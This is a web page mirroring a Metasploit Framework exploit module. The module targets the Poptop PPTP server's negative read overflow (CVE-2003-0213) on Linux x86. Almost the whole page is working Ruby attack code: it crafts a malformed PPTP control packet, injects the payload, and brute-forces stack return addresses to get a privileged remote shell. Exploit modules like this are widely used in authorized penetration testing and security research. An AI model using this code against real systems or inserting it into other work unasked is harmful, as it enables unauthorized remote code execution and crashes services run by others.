Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/pptp/poptop_negative_read.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Brute

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Poptop Negative Read Overflow',

17
        'Description' => %q{

18
          This is an exploit for the Poptop negative read overflow.  This will

19
          work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I

20
          currently do not have a good way to detect Poptop versions.

21


22
          The server will by default only allow 4 concurrent manager processes

23
          (what we run our code in), so you could have a max of 4 shells at once.

24


25
          Using the current method of exploitation, our socket will be closed

26
          before we have the ability to run code, preventing the use of Findsock.

27
        },

28
        'Author' => 'spoonm',

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          ['CVE', '2003-0213'],

32
          ['OSVDB', '3293'],

33
          ['URL', 'https://web.archive.org/web/20210120064041/http://securityfocus.com/archive/1/317995'],

34
          ['URL', 'https://web.archive.org/web/20061215104830/http://www.freewebs.com/blightninjas/'],

35
        ],

36
        'Privileged' => true,

37
        'Payload' => {

38
          # Payload space is dynamically determined

39
          'MinNops' => 16,

40
          'StackAdjustment' => -1088,

41
          'Compat' => {

42
            'ConnectionType' => '-find'

43
          }

44
        },

45
        'SaveRegisters' => [ 'esp' ],

46
        'Platform' => 'linux',

47
        'Arch' => ARCH_X86,

48
        'Targets' => [

49
          [

50
            'Linux Bruteforce',

51
            {

52
              'Bruteforce' => {

53
                'Start' => { 'Ret' => 0xbffffa00 },

54
                'Stop' => { 'Ret' => 0xbffff000 },

55
                'Step' => 0

56
              }

57
            }

58
          ],

59
        ],

60
        'DefaultTarget' => 0,

61
        'DisclosureDate' => '2003-04-09',

62
        'Notes' => {

63
          'Stability' => [CRASH_SERVICE_DOWN],

64
          'SideEffects' => [IOC_IN_LOGS],

65
          'Reliability' => [REPEATABLE_SESSION]

66
        }

67
      )

68
    )

69


70
    register_options(

71
      [

72
        Opt::RPORT(1723)

73
      ]

74
    )

75


76
    register_advanced_options(

77
      [

78
        OptInt.new('PreReturnLength', [ true, 'Space before we hit the return address.  Affects PayloadSpace.', 220 ]),

79
        OptInt.new('RetLength', [ true, 'Length of returns after payload.', 32 ]),

80
        OptInt.new('ExtraSpace', [

81
          true,

82
          'The exploit builds two protocol frames, the header frame and the control frame. ' \

83
          'ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). ' \

84
          "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " \

85
          "(these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.",

86
          0

87
        ]),

88
        OptString.new('Hostname', [ false, 'PPTP Packet hostname', '' ]),

89
        OptString.new('Vendor', [ true, 'PPTP Packet vendor', 'Microsoft Windows NT' ]),

90
      ]

91
    )

92
  end

93


94
  # Dynamic payload space calculation

95
  def payload_space(_explicit_target = nil)

96
    datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i

97
  end

98


99
  def build_packet(length)

100
    [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +

101
      [1, 0].pack('cc') +

102
      [0].pack('n') +

103
      [1, 1, 0, 2600].pack('NNnn') +

104
      datastore['Hostname'].ljust(64, "\x00") +

105
      datastore['Vendor'].ljust(64, "\x00")

106
  end

107


108
  def check

109
    connect

110
    sock.put(build_packet(156))

111
    res = sock.get_once

112


113
    if res && res =~ /MoretonBay/

114
      return CheckCode::Detected

115
    end

116


117
    CheckCode::Safe

118
  end

119


120
  def brute_exploit(addrs)

121
    connect

122


123
    print_status("Trying #{'%.8x' % addrs['Ret']}...")

124


125
    # Construct the evil length packet

126
    packet =

127
      build_packet(1) +

128
      payload.encoded +

129
      ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

130


131
    sock.put(packet)

132


133
    handler

134
    disconnect

135
  end

136
end

137


138